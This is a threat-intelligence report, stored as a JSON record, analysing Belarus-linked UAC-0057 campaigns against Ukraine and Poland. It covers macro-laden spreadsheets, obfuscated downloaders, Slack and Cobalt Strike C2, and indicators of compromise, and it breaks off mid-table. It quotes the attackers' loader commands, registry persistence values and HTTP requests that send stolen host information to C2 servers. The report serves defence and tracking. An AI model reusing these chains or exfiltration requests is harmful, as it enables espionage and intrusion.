{
	"id": "bb35c734-61c4-4ed8-aa24-e8aefdf2d4d9",
	"created_at": "2026-04-06T00:13:16.585251Z",
	"updated_at": "2026-04-10T03:35:10.600832Z",
	"deleted_at": null,
	"sha1_hash": "075c05d08e575ac604b3f9bd89a7c79d0989be72",
	"title": "UAC-0057 keeps applying pressure on Ukraine and Poland",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4894766,
	"plain_text": "UAC-0057 keeps applying pressure on Ukraine and Poland\r\nPublished: 2025-08-20 · Archived: 2026-04-05 16:58:17 UTC\r\nPublished on 20 August, 2025 34min\r\nIdentifier: TRR250801.\r\nSummary\r\nIn late July, we identified two clusters of malicious archives that were leveraged to target Ukraine and Poland\r\nsince April 2025, and that we could link together from their similarities. Resulting infection chains are aimed at\r\ncollecting information about compromised systems and deploying implants for further exploitation. The toolset\r\nwe analyzed notably relies on readily available tools for obfuscation or packing purposes.\r\nWe noticed striking similarities with publicly reported activities that are associated with UAC-0057 (also known\r\nas UNC1151, FrostyNeighbor or Ghostwriter), a cyber espionage actor with reported ties to the Belarusian\r\ngovernment.\r\nhttps://harfanglab.io/insidethelab/uac-0057-pressure-ukraine-poland/\r\nPage 1 of 20\n\nOur report analyses the identified infection chains including decoy content, malicious execution logic, system\r\ninformation discovery approaches, first stage implants workflows as well as associated infrastructure, and offers\r\nbaselines to detect and track the described activities. 
We also provide insights into the evolution of the threat\r\nactor’s toolset and practices, including the use of a cloud-hosted collaboration service for command and control\r\ncommunication, and the setup of the supporting infrastructure.\r\n📑\r\nBackground: Eastern European ghostwriters and cyber espionage\r\nInfection chains\r\nInfection chain which targeted Ukraine\r\nInfection chain which targeted Poland\r\nSimilarities across the different campaigns\r\nInfrastructure\r\nC2 domains\r\nC2 URLs and associated pictures\r\nSlack teams\r\nTargets\r\nAttribution: similarities with reported UAC-0057 activity\r\nConclusion: minor evolutions to disciplined targeting\r\nAppendix: indicators and detection rules\r\nIndicators of compromise (IOCs)\r\nYARA rules\r\nBackground: Eastern European ghostwriters and cyber espionage\r\nIn 2020, Mandiant published a report about an influence campaign dubbed “Ghostwriter” and aligned with Russia’s security\r\ninterests. Personas, some inauthentic, some impersonating real individuals such as journalists or academics, would post\r\nfalsified articles often containing anti-NATO narratives on compromised news websites. These narratives would also be\r\nrelayed through emails sent to media organisations or individuals, or on social media.\r\nIn April 2021, the cybersecurity company associated a state-sponsored cyber espionage threat actor they track as UNC1151\r\nto the influence activity of Ghostwriter, and later published a report on their high-confidence assessment that UNC1151 is\r\nlinked to the Belarusian government.\r\nSince then, reports from vendors and governmental organisations have referred to the threat actor behind seemingly related\r\nactivity as FrostyNeighbor, UAC-0057, also sometimes using the name of the influence campaign, Ghostwriter.\r\nLast year, the Ukrainian CERT (CERT-UA) reported a surge of activity of UAC-0057 during the summer of 2024. 
Early\r\n2025, SentinelOne published a blog post about a campaign targeting Ukrainian military and government organisations as\r\nwell as Belarusian government opposition that they attribute to Ghostwriter.\r\nInfection chains\r\nWe identified a cluster of compressed archive files which were likely intended to be delivered to Ukrainian targets between\r\nlate May 2025 and late July 2025. We could not determine how those archives were delivered, but we believe they were\r\ndistributed via spearphishing emails, either as attachments or through download links.\r\nThese archives contain XLS spreadsheets with a VBA macro that drops and loads a DLL. The latter is responsible for\r\ncollecting information about the compromised system and retrieving next stage malware from a command and control (C2)\r\nserver.\r\nOur analysis allowed us to identify other samples that we associate with the same threat actor, but which belong to a\r\ndifferent campaign targeting Poland.\r\nIn the following sections, we describe the infection chains for both campaigns. For the purposes of clarity and conciseness,\r\nwe only provide details about chosen samples of each campaign.\r\nInfection chain which targeted Ukraine\r\nThe following 3 archives were uploaded to an online multiscanner service between June 12, 2025 and July 30, 2025.\r\nSHA-256 hash | Filename (date of most recent content file)\r\n5df1e1d67b92e2bba8641561af9967e3a54ec73600283c66b09c8165ddcb7de9 | Список на перевірку 2025-2026 (2).rar (2025-07-30)\r\n699c50014cdbe919855c25eb35b15dfc8e64f73945187da41d985a9d7be31a71 | ПЛАН наповнення СФ_ЗМІНЕНИЙ.zip (2025-07-22)\r\n26ea842c4259c90349a1f4db92efa89ac4429a5ff380e7f72574426cfd647f1a | N/A (2025-05-30)\r\nAll of these contain an XLS spreadsheet which embeds a VBA macro. Once executed, the macro drops a DLL which is\r\nloaded using regsvr32.exe. 
The exact execution logic differs depending on the archives creation date:\r\nFigure 1 – Infection chain for May archive\r\nFigure 2 – Infection chain for July archives\r\nhttps://harfanglab.io/insidethelab/uac-0057-pressure-ukraine-poland/\r\nPage 3 of 20\n\nThe dropped DLL, which we will later refer to as the first stage implant, is written in C# and obfuscated using ConfuserEx.\r\nIt establishes persistence using the current user’s “Run” registry key, collects information about the compromised system,\r\nsends that information to the C2 server and periodically attempts to retrieve a next stage from the C2.\r\nDecoy documents\r\nOne of the aforementioned archives (SHA-256 26ea842c4259c90349a1f4db92efa89ac4429a5ff380e7f72574426cfd647f1a )\r\ncontains a 3 pages PDF document ( покрокова інструкція.pdf\r\n1\r\n), serving as a decoy.\r\nThis PDF document (see Fig. 3) was produced on May 30, 2025 according to the file’s metadata. It provides information for\r\ncompanies to benefit from certain services of the “Diia” (affiliated to the Ministry of Digital Transformation of Ukraine). 
We\r\ncould find the same content and formatting in a post from the Ministry of Digital Transformation of Ukraine that was\r\npublished on April 17, 2025 on the website of the Cabinet of Ministers of Ukraine (translated from “Кабінет Міністрів\r\nУкраїни”).\r\nFigure 3 – Decoy content from покрокова інструкція.pdf\r\nThe XLS spreadsheet of that same archive ( роз'яснення.xls ) also displays decoy content (a likely list of contracts) once\r\nthe macro is executed:\r\nFigure 4 – Decoy content as displayed from роз’яснення.xls following macro execution\r\nXLS spreadsheets\r\nSHA-256 hash | Filename\r\nf6fec3722a8c98c29c5de10969b8f70962dbb47ba53dcbcd4a3bbc63996d258d | Список на перевірку 2025-2026.xls\r\ndeaa3f807de097c3bfff37a41e97af5091b2df0e3a6d01a11a206732f9c6e49c | ПЛАН наповнення СФ_ЗМІНЕНИЙ.xls\r\naac430127c438224ec61a6c02ea59eb3308eb54297daac985a7b26a75485e55f | роз'яснення.xls\r\nThe exact execution chain leading to the DLL evolved between May and July, and is briefly described hereafter (see Fig.\r\n1 and 2 above).\r\nроз’яснення.xls\r\nUsing string concatenation, the VBA macro writes a DLL to %TEMP%\\DefenderProtectionScope.log and uses the\r\nShell.ShellExecute method to load it with regsvr32 /u /s %TEMP%\\DefenderProtectionScope.log .\r\nПЛАН наповнення СФ_ЗМІНЕНИЙ.xls\r\nIn this sample, the VBA macro decrypts the DLL and ultimately writes it to %LOCALAPPDATA%\\Serv\\0x00bac729fe.log . It\r\nthen creates an LNK file ( %APPDATA%\\Microsoft\\Windows\\Protection overview.lnk ) set to execute\r\nC:\\Windows\\System32\\regsvr32.exe /u /s \"%LOCALAPPDATA%\\Serv\\0x00bac729fe.log\" .\r\nContrary to the first sample, this VBA macro is partially obfuscated (strings remain in cleartext). 
The obfuscation is\r\nconsistent with the result of MacroPack (an offensive security tool which is available on GitHub) when executed with the -\r\n-obfuscate-names parameter.\r\nСписок на перевірку 2025-2026.xls\r\nThis sample does not directly drop a DLL, but first writes a Microsoft Cabinet (CAB) file to \"%TEMP%\\sdw9gobh0n\" .\r\nIn addition, it creates an LNK file ( %APPDATA%\\Microsoft\\Windows\\Protection overview past.lnk ) that uses expand.exe\r\nto extract the DLL from the CAB file to \"%LOCALAPPDATA%\\Logs\\sdw9gobh0n.log\" , where previous samples would either\r\nhttps://harfanglab.io/insidethelab/uac-0057-pressure-ukraine-poland/\r\nPage 5 of 20\n\nload the DLL directly from a temporary directory where it had been dropped, or copy it to another directory (using the VBA\r\nmethod CopyFile() ).\r\nThe macro runs this first LNK file, and then creates a second one ( %APPDATA%\\Microsoft\\Windows\\Protection\r\noverview.lnk ) to load the extracted DLL via C:\\Windows\\System32\\regsvr32.exe with \" /u /s\r\n%LOCALAPPDATA%\\Logs\\sdw9gobh0n.log\" as arguments. The obfuscation in this sample is consistent with the use of\r\nMacroPack with all options for obfuscation being enabled, as strings are no longer in cleartext contrary to the previous\r\nsample.\r\nFirst stage C# DLL implants\r\nThe following samples are .NET DLL assemblies written in C# and obfuscated with ConfuserEx. 
They serve as downloaders\r\nfor an unidentified next stage, and have the ability to collect information about the compromised system.\r\nSHA-256 hash\r\nFilename (compilation\r\ntimestamp)\r\nParent XLS\r\nfilename\r\n707a24070bd99ba545a4b8bab6a056500763a1ce7289305654eaa3132c7cbd36\r\nDefenderProtectionScope.log\r\n(2025-05-29 11:37:46 UTC)\r\nроз'яснення.xls\r\n8a057d88a391a89489697634580e43dbb14ef8ab1720cb9971acc418b1a43564\r\n0x00bac729fe.log (2025-07-\r\n10 08:07:01 UTC)\r\nПЛАН наповненн\r\nСФ_ЗМІНЕНИЙ.xl\r\na2a2f0281eed6ec758130d2f2b2b5d4f578ac90605f7e16a07428316c9f6424e\r\nsdw9gobh0n.log (2025-07-29\r\n03:46:59 UTC)\r\nСписок на\r\nперевірку 2025-\r\n2026.xls\r\nVariant 1 ( DefenderProtectionScope.log )\r\nDefenderProtectionScope.log (internal name: InfoUploader.dll ) collects the following pieces of information about the\r\ncompromised system:\r\nOS platform identifier and version;\r\nhostname;\r\nCPU name (using a WMI query);\r\ncurrent user name;\r\noperating system install date (using a WMI query);\r\ndate at which the system was booted (with a bug 5);\r\ninstalled antivirus product name and installation date (using a WMI query);\r\ninformation about the IP address which is used to browse on the Internet (retrieved by sending an HTTP GET request\r\nto hxxps://ip-info.ff.avast[.]com/v1/info ).\r\nThis information is then sent as form data to hxxps://punandjokes[.]icu/cannabis-jokes.jpg (C2 server) via an HTTP\r\nPOST request:\r\nPOST /cannabis-jokes.jpg HTTP/1.0\r\nHost: punandjokes[.]icu\r\nConnection: close\r\nContent-Length: \u003ccalculated-content-length\u003e\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 
Safari/53\r\noQlJbw=\u003cBase64-encoded-OS-platform-identifier-and-version\u003e\u0026NsAUjZ=\u003cBase64-encoded-hostname\u003e\u0026sCXaqf=\u003cBase64-encoded-CPU-nam\r\nhttps://harfanglab.io/insidethelab/uac-0057-pressure-ukraine-poland/\r\nPage 6 of 20\n\nThe implant attempts to send the collected information to the C2 server every 10 minutes. Once sent, it then tries to\r\ndownload a next stage from the C2 server every 30 minutes. Upon successful retrieval (involving a check on the response\r\nsize to make sure that the data is larger than 220000 bytes), the next stage is written to\r\n%APPDATA%\\Microsoft\\System\\ProtectedCertSystem.dll , and run using the following command: rundll32\r\n%APPDATA%\\Microsoft\\System\\ProtectedCertSystem.dll,#1 .\r\nTo achieve persistence, the implant adds two entries to the current user’s “Run” registry key:\r\nFor the implant itself, it creates SytemProtectionService with the value: regsvr32 /u /s \u003ccurrent-implant-file-path\u003e ;\r\nFor the retrieved next stage, it creates MicrosoftDefender with the value: rundll32\r\n%APPDATA%\\Microsoft\\System\\ProtectedCertSystem.dll,#1 .\r\nVariant 2 ( sdw9gobh0n.log , 0x00bac729fe.log )\r\n0x00bac729fe.log (internal name: InfoUploader.dll ) and sdw9gobh0n.log (internal name: Downloader.dll ) share\r\nsimilar implementation and capabilities. Therefore, only details regarding the most recent sample, sdw9gobh0n.log , are\r\nprovided. 
Despite some differences in string encryption or hardcoded values, most of what is described hereafter also applies\r\nto 0x00bac729fe.log .\r\nTo persist, the implant adds an Audio Driver value to the user’s “Run” registry key with the command: regsvr32 /u /s\r\n\u003cimplant-current-file-path\u003e .\r\nIt then proceeds to collect the following information about the compromised system:\r\noperating system (and version if running on Windows);\r\nhostname;\r\ncurrent user name;\r\noperating system install date (using a WMI query);\r\ndate at which the system was booted (using a WMI query);\r\ninstalled antivirus product names, current states and install dates (using a WMI query);\r\ninformation about the IP address which is used to browse on the Internet (also retrieved using hxxps://ip-info.ff.avast[.]com/v1/info ).\r\nThis information is arranged in a JSON-formatted structure, Base64-encoded, and sent as a cookie ( mod0api ) value to the\r\nC2 server via an HTTP POST request: hxxps://sweetgeorgiayarns[.]online/wp-content/uploads/2025/04/06102226/Kims-hand-cards.jpg\r\nPOST /wp-content/uploads/2025/04/06102226/Kims-hand-cards.jpg HTTP/1.0\r\nHost: sweetgeorgiayarns[.]online\r\nConnection: close\r\nContent-Length: 0\r\nContent-Type: application/x-www-form-urlencoded\r\nCookie: mod0api=\u003cBase64-encoded-collected-information\u003e\r\nNote that the same User-Agent found in the previous samples is used in all web requests: Mozilla/5.0 (Windows NT 10.0;\r\nWin64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 .\r\nAfter a 10-minute sleep, the implant enters an infinite loop to fetch payloads from the C2 server. The latter is expected to\r\nrespond with a Cookie header containing three values: a file path, an execution command, and a persistence flag. If the\r\nreceived file path is longer than five characters, the implant saves the payload to that path and runs it using the provided\r\ncommand (spawned via cmd.exe /c ). 
If the persistence flag is set, the implant creates a new entry in the current user’s\r\n“Run” registry key using the payload’s filename as value and the execution command as its data. The implant repeats this\r\nprocess every 30 minutes.\r\nhttps://harfanglab.io/insidethelab/uac-0057-pressure-ukraine-poland/\r\nPage 7 of 20\n\nInfection chain which targeted Poland\r\nIn this section, we describe infection chains targeting Poland in April and May 2025.\r\nInfection files from April 2025\r\nWe identified the following 2 very similar archives as uploaded to an online multiscanner in April 2025 from Poland (see\r\nFig. 5).\r\nSHA-256 hash\r\nFilename (date of most recent content\r\nfile)\r\n730c1a02bb31d548d91ba23fce870b1dc53c4802ea4fcb0d293f96de670d74af ZGRW_nr_F00038524.zip (2025-04-21)\r\n57e0280dc5b769186588cc3a27a8a9be6f6e169551bbef39f95127e9326627f2 pks_250422325349_01.zip (2025-04-22)\r\nFigure 5 – Infection chain for April archives\r\nDecoy documents\r\nOne archive (SHA-256 43688170c27bcb2649360e48e08540c52a2d41ef55a84033e8516ce53921ede5 ) contains a one page PDF\r\ninvitation for the May 8, 2025, general assembly of the Union of Rural Municipalities of the Republic of Poland (translated\r\nfrom “Związek Gmin Wiejskich Rzeczypospolitej Polskiej”).\r\nWe found the same file available for download on the website of the union, indicating the threat actor repurposed an existing\r\nfile. 
According to the ZIP archive’s timestamps, this PDF was packaged alongside the XLS spreadsheet on April 21, 2025.\r\nhttps://harfanglab.io/insidethelab/uac-0057-pressure-ukraine-poland/\r\nPage 8 of 20\n\nFigure 6 – Decoy content from 1_39ZO ZGWRP_zaproszenie.pdf\r\nXLS spreadsheets\r\nSHA-256 hash Filename\r\n082903a8bec2b0ef7c7df3e75871e70c996edcca70802d100c7f68414811c804 2_39ZO ZGWRP_program.xls\r\n69636ddc0b263c93f10b00000c230434febbd49ecdddf5af6448449ea3a85175 pks_250422325349_01.xls\r\nBoth samples contain a very similar VBA macro, obfuscated with MacroPack, that implements identical dropping and next\r\nstage loading processes. As an example, the VBA macro in 2_39ZO ZGWRP_program.xls :\r\nwrites a CAB file to %PROGRAMDATA%\\OfficeRuntimeBroker.xlam ;\r\nhttps://harfanglab.io/insidethelab/uac-0057-pressure-ukraine-poland/\r\nPage 9 of 20\n\ncreates the OfficeRuntimeBroker.lnk file in %PROGRAMDATA% with C:\\Windows\\System32\\expand.exe as a target\r\nand the following arguments: %PROGRAMDATA%\\OfficeRuntimeBroker.xlam\r\n%PROGRAMDATA%\\~OfficeRuntimeBroker.dat ;\r\nruns the LNK file using rundll32.exe shell32.dll,ShellExec_RunDLL %PROGRAMDATA%\\OfficeRuntimeBroker.lnk\r\nto extract the content from the CAB file to %PROGRAMDATA%\\~OfficeRuntimeBroker.dat ;\r\nwrites a new LNK file to the same path as the previous one with C:\\Windows\\System32\\rundll32.exe as a target\r\nand the following arguments: %PROGRAMDATA%\\~OfficeRuntimeBroker.dat,TS_STATUS_INFO_get0_status ;\r\nruns the LNK file using rundll32.exe shell32.dll,ShellExec_RunDLL %PROGRAMDATA%\\OfficeRuntimeBroker.lnk\r\nto load the DLL.\r\nFirst stage C# DLL implants\r\nSHA-256 hash\r\nFilename (compilation\r\ntimestamp)\r\nParent XLS filename\r\n7c77d1ba7046a4b47aec8ec0f2a5f55c73073a026793ca986af22bbf38dc948c\r\n~OfficeRuntimeBroker.dat\r\n(2025-04-21 07:55:57 UTC)\r\n2_39ZO\r\nZGWRP_program.xls  
\r\n559ee2fad8d16ecaa7be398022aa7aa1adbd8f8f882a34d934be9f90f6dcb90b | ~DF20BC61C6277A354A.dat (2025-04-22 12:55:16 UTC) | pks_250422325349_01\r\nThe dropped implants are C# .NET DLL assemblies, obfuscated with ConfuserEx and internally named jkyhrgkek30.dll .\r\nAlthough they export 50 functions named after the OpenSSL library, only TS_STATUS_INFO_get0_status contains\r\nfunctional code. Both samples share the same logic, differing only in their C2 parameters and hardcoded filenames.\r\nUpon execution, they collect the following information from the compromised system:\r\nOS platform identifier and version;\r\nhostname;\r\nCPU name (using a WMI query);\r\ncurrent user name;\r\noperating system install date (using a WMI query);\r\ndate at which the system was booted (with the same implementation bug as in a sample that targeted Ukraine);\r\ninformation about the IP address which is used to browse on the Internet (also retrieved using hxxps://ip-info.ff.avast[.]com/v1/info ).\r\nThis data is concatenated, RC4-encrypted with a 256-byte key, and Base64-encoded prior to being sent to the C2 server\r\n(using the URL-safe alphabet: + replaced with - , and / replaced with _ ). The same RC4 key is used in both samples. The information\r\ncollection implementation is similar to the one of the C# downloaders used in the campaign targeting Ukraine, even\r\nreplicating a bug that was not fixed before the latest samples of that same campaign.\r\nThese downloaders use Slack as a C2 server, leveraging the webhook mechanism to upload data. Once the data is uploaded,\r\nthey immediately attempt to download a next stage from a download URL ending with .jpg , before decrypting that next\r\nstage using RC4 and the same key used to encrypt the information collected on the system. 
Then, the downloaders write the\r\ndecrypted data to a file in C:\\ProgramData\\ (file path is hardcoded and differs between samples, example:\r\nC:\\ProgramData\\ssh\\ssh.pif.pif.pif ), and run the next stage using a WScript.Shell object instantiated via the COM\r\nAPI.\r\nThe following User-Agent is used for all web requests: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\r\n(KHTML, like Gecko) Chrome/88.0.4093.093 Safari/537.36\r\nThese downloaders do not implement any persistence mechanism, and the described logic is run only once.\r\nhttps://harfanglab.io/insidethelab/uac-0057-pressure-ukraine-poland/\r\nPage 10 of 20\n\nAccording to sandbox reports from an online multiscanner, the next stage retrieved by one of these downloaders\r\n( ~OfficeRuntimeBroker.dat ) has communicated with the domain pesthacks[.]icu , which shares similarities with the\r\ndomains supporting other campaigns that we analyzed (see Infrastructure).\r\nInfection files from May 2025\r\nThe BHP.zip and Z-15a.rar archives were submitted to an online multiscanner on May 27 and May 26, 2025\r\nrespectively. They contain a single XLS spreadsheet named after the archive itself ( BHP.xls and Z-15a.xls , see Fig. 7).\r\nSHA-256 hash Filename (first seen)\r\n3fff6c8a8ef3f153ebbe6d469a0d970953358a25bb9b4955a2592626f011cbd6 Z-15a.rar (2025-05-26)\r\n6e562afa3193c2ca5d2982e04de78cf83faa203534a6098ab5f08df94bbeb944 BHP.zip (2025-05-27)\r\nFigure 7 – Infection chain for May archives\r\nXLS spreadsheet\r\nThe spreadsheet (SHA-256 06380c593d122fc4987e9d4559a9573a74803455809e89dd04d476870a427cbe ) is identical in both\r\narchives and has an obfuscated VBA macro that decrypts and drops a DLL to %LOCALAPPDATA%\\SDXHelp\\SDXHelp.dll . 
The\r\nDLL is then being loaded with rundll32 %LOCALAPPDATA%\\SDXHelp\\SDXHelp.dll,#1 via the ShellExecute function.\r\nFirst stage C++ DLL implant\r\nThe implant is a C++ DLL which has a single export named Start and has been packed with UPX.\r\nFilename SDXHelp.dll\r\nFile type 32-bit PE (DLL)\r\nCompilation timestamp 2025-05-26 11:27:40 UTC\r\nHash (SHA-256) 5fa19aa32776b6ab45a99a851746fbe189f7a668daf82f3965225c1a2f8b9d36\r\nUpon execution, it collects the following information about the host:\r\nhostname;\r\nCPU name;\r\nhttps://harfanglab.io/insidethelab/uac-0057-pressure-ukraine-poland/\r\nPage 11 of 20\n\navailable memory;\r\nWindows build;\r\nOS install date (using a WMI query);\r\nsystem boot date;\r\nusername;\r\ninformation about the IP address which is used to browse on the Internet (also retrieved using hxxps://ip-info.ff.avast[.]com/v1/info );\r\nthe antivirus names and install dates (using a WMI query).\r\nThis information is Base64-encoded, arranged in a JSON structure ( {\"cookie\":\"\u003chost-information\u003e\"} ), and sent to\r\nhxxps://taskandpurpose[.]icu/hews/coast-guard-0reg0n-c0ncrete.jpg (C2 server) via an HTTP POST request as body:\r\nPOST /hews/coast-guard-0reg0n-c0ncrete.jpg HTTP/1.0\r\nHost: taskandpurpose[.]icu\r\nConnection: close\r\nContent-Length: \u003ccalculated-content-length\u003e\r\nContent-Type: application/json\r\nUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 18_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/133.0.\r\n{\"cookie\":\"\u003cBase64-encoded-collected-information\u003e\"}\r\nThe implant makes use of the TaskScheduler COM interface to achieve persistence by registering a scheduled task named\r\n\\UpdateSDX which runs the following command at user logon: C:\\Windows\\system32\\rundll32.exe\r\n%LOCALAPPDATA%\\SDXHelp\\SDXHelp.dll,#1 .\r\nEvery 20 minutes, the implant attempts to download a DLL from the C2 server by sending an HTTP GET request to the\r\nprevious URL. 
Upon successful retrieval, it decrypts it using a byte-wise XOR with a 128-byte key, which is also used for\r\nthe decryption of the hardcoded strings.\r\nIf the retrieved file size is at least 356804 bytes, only the data after the first 356804 bytes is decrypted. A JPEG file (SHA-256 b39411abe494e2b04419a32c72fb1968ba745b3d7b04e9e8ebbab872df794b35 ) of this exact size, retrieved by an online\r\nmultiscanner from the C2 URL, suggests that the next stage would be appended to this image file and delivered to\r\ncompromised hosts which meet a certain set of requirements (an assessment likely based on the information collected on the\r\nhost).\r\nThe decrypted DLL is written to %LOCALAPPDATA%\\Runtime\\RuntimeBroker.dll . Then, the implant registers a scheduled\r\ntask named RuntimeBroker which loads the next stage using C:\\Windows\\system32\\rundll32.exe\r\n%LOCALAPPDATA%\\Runtime\\RuntimeBroker.dll,#1 , and launches an instance of this scheduled task before deleting it.\r\nIn all exchanges with the C2 server, the following User-Agent string is used: Mozilla/5.0 (iPhone; CPU iPhone OS 18_4_1\r\nlike Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/133.0.6943.84 Mobile/15E148 Safari/604.1 .\r\nNote that the User-Agent string set in requests to hxxps://ip-info.ff.avast[.]com/v1/info differs: Mozilla/5.0\r\n(Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.8761.1412\r\nSafari/537.36 .\r\nInfection chain variant leading to Cobalt Strike\r\nWe identified another XLS spreadsheet (SHA-256\r\n082877e6f8b28f6cf96d3498067b0c404351847444ebc9b886054f96d85d55d4 , named STAN NA ELEWATORZE 2024.xls ) which\r\nshares similarities with the previously described XLS files, and was submitted from Poland on May 14, 2025 to an online\r\nmultiscanner service.\r\nThis file contains yet another instance of a MacroPack-obfuscated VBA macro which aims 
to decrypt and write a DLL to\r\n%LOCALAPPDATA\\MSDE\\mrasp86.dll . It also creates an LNK file, %APPDATA%\\Microsoft\\Windows\\Protection overview.lnk ,\r\nwhich is run to load the DLL using C:\\Windows\\System32\\rundll32.exe \"%LOCALAPPDATA%\\MSDE\\mrasp86.dll\",#1 .\r\nWe notice that the path and file name of the LNK file ( %APPDATA%\\Microsoft\\Windows\\Protection overview.lnk ), as well\r\nas the loading process of the implant, are identical to what was observed in samples associated with the campaign targeting\r\nUkraine.\r\nThe dropped DLL (SHA-256 3b5980c758bd61abaa4422692620104a81eefbf151361a1d8afe8e89bf38579d , internal name:\r\nDiagnExp.dll ) is written in C++, has a single export, Start , and has been packed with UPX, similarly to the previously\r\ndescribed SDXHelp.dll sample (SHA-256 5fa19aa32776b6ab45a99a851746fbe189f7a668daf82f3965225c1a2f8b9d36 ). The\r\nimplant writes another DLL to %APPDATA%\\DiagnosticComponents\\DiagnosticComponents.dll and leverages the Task\r\nScheduler COM interface to register a scheduled task ( \\ExpDiagnosticDataSettings ) and to trigger the execution of\r\nDiagnosticComponents.dll .\r\nDiagnosticComponents.dll (SHA-256 c7e44bba26c9a57d8d0fa64a140d58f89d42fd95638b8e09bc0d2020424b640e , internal\r\nname: inj_p.dll ) also has a single export named Start , and acts as a loader for a Cobalt Strike Beacon, which\r\ncommunicates with the following C2 server: hxxps://medpagetoday[.]icu/nicheediting/trends . This sample was run in\r\npublic sandboxes, and as a result, the configuration of the Beacon is available online.\r\nSimilarities across the different campaigns\r\nDespite notable variations between the two described campaigns (e.g. 
C# downloaders only for Ukraine but C++\r\ndownloaders for Poland), our analysis reveals numerous overlaps:\r\nInitial access: consistent use of weaponized XLS spreadsheets with VBA macros, many of which appear to be\r\nobfuscated with MacroPack;\r\nExecution chains: similar execution flows, often leveraging LNK files to load dropped DLLs;\r\nCode and artifact reuse: identical code segments were found in the C# downloaders across the two campaigns.\r\nMoreover, specific file paths and names, such as %APPDATA%\\Microsoft\\Windows\\Protection overview.lnk , were\r\nreused;\r\nProfiling: Both campaigns used hxxps://ip-info.ff.avast[.]com/v1/info for external IP address discovery;\r\nInfrastructure: A similar C2 infrastructure setup was observed across both campaigns.\r\nInfrastructure\r\nC2 domains\r\nThe threat actor demonstrates consistency in the setup of the supporting infrastructure for the campaigns described in this\r\nreport. The following table lists the C2 domains used for both the campaign targeting Ukraine and the campaign targeting\r\nPoland, since April 2025. 
For each of these domains, the threat actor additionally leverages Cloudflare name servers and\r\nproxies.\r\nDomain | Registrar (registration date, registrant mail domain and country) | TLS certificate CA | Impersonated domain | Estimated operation date\r\npesthacks[.]icu | PublicDomainRegistry (2025-03-04, proton.me US) | Google Trust Services | pesthacks[.]com | April 2025\r\nmedpagetoday[.]icu | PublicDomainRegistry (2025-02-28, proton.me US) | Google Trust Services | medpagetoday[.]com | May 2025\r\ntaskandpurpose[.]icu | PublicDomainRegistry (2025-03-05, proton.me US) | Google Trust Services | taskandpurpose[.]com | May 2025\r\npunandjokes[.]icu | PublicDomainRegistry (2025-03-05, proton.me US) | Google Trust Services | punandjokes[.]com | May/June 2025\r\nkitchengardenseeds[.]icu | PublicDomainRegistry (2025-03-10, proton.me US) | Google Trust Services | kitchengardenseeds[.]com | July 2025\r\nsweetgeorgiayarns[.]online | PublicDomainRegistry (2025-02-20, protonmail.com US) | Google Trust Services | sweetgeorgiayarns[.]com | July/August 2025\r\nWe also noticed that the HTTPS root path for one C2 domain ( sweetgeorgiayarns[.]online ) redirected to the seemingly\r\nlegitimate and unrelated curseforge[.]com website (which distributes video game mods) between 2025-07-26 and\r\n2025-07-30, when the domain was a C2 server for a C# downloader that targeted Ukraine. It is unclear if this redirection to an\r\nunrelated website is the result of a voluntary act. Such redirections might be set up to have the domain miscategorized as a\r\ngaming website by web filtering services. 
In any case, we could determine that curseforge[.]icu also implements the\r\nsame redirection, appears to be an impersonation of curseforge[.]com , and is registered in the exact same way than the C2\r\ndomains we previously listed. As a result, we believe with low confidence that this domain might be leveraged by the threat\r\nactor, or a third party that supports the threat actor.\r\nDomain\r\nRegistrar (registration date, registrant mail\r\ndomain and country)\r\nTLS Certificate\r\nCA\r\nImpersonated\r\ndomain\r\ncurseforge[.]icu\r\nPublicDomainRegistry (2025-02-05, proton.me\r\nUS)\r\nGoogle Trust\r\nServices \r\ncurseforge[.]com\r\nC2 URLs and associated pictures\r\nIn some instances, C2 URLs are identical or very similar to URLs of legitimate websites associated with the impersonated\r\ndomains listed above. For example, the C2 URL of the most recent C# downloader we observed (SHA-256\r\na2a2f0281eed6ec758130d2f2b2b5d4f578ac90605f7e16a07428316c9f6424e ) is the following:\r\nhxxps://sweetgeorgiayarns[.]online/wp-content/uploads/2025/04/06102226/Kims-hand-cards.jpg .\r\nAccording to the results of an online multiscanner service, a JPEG image file showing the following picture (SHA-256\r\n34f97d0bd753d534d376725553b31de9860c2c96c96202a139281c6fa2bc85ee ) has been served from this C2 URL on July 30,\r\n2025:\r\nhttps://harfanglab.io/insidethelab/uac-0057-pressure-ukraine-poland/\r\nPage 14 of 20\n\nFigure 8 – Reproduction of the original Kims-hand-cards.jpg image (the image file we included in this report\r\nis however not the original file)\r\nThis image file is identical to the one included on a post that was published on July 15, 2025 at\r\nhxxps://sweetgeorgiayarns[.]com/hand-cards-your-first-fibre-prep-tool/ , and served from the following URL:\r\nhxxps://cdn1.sweetgeorgiayarns[.]com/wp-content/uploads/2025/04/06102226/Kims-hand-cards.jpg . 
We observe that the path /wp-content/uploads/2025/04/06102226/Kims-hand-cards.jpg has been reproduced by the threat actor in the C2 URL.\r\nSimilarly, the SDXHelp.dll sample that we associated with a campaign targeting Poland has the following C2 URL:\r\nhxxps://taskandpurpose[.]icu/hews/coast-guard-0reg0n-c0ncrete.jpg\r\nIn this case, the URL path is slightly different from the one on the legitimate website, as news became hews, and the name of the JPEG file was derived from the last part of the path: hxxps://taskandpurpose[.]com/news/coast-guard-oregon-concrete/ (with the letter o replaced by the digit 0). Also, the displayed image (SHA-256 b39411abe494e2b04419a32c72fb1968ba745b3d7b04e9e8ebbab872df794b35) has been taken from an online commercial image library, and it does not appear to be associated with any of the content of the legitimate website.\r\nSlack teams\r\nOther first stage samples that we associate with a campaign targeting Poland use Slack as a C2 channel. The associated Slack team IDs appear to match Slack’s “free subscription” offer (they are not associated with an enterprise account):\r\nSlack team ID | Account/Workspace name | Creation date\r\nT08NWSF1L78 | Cakybo | 2025-04-22 12:38:42 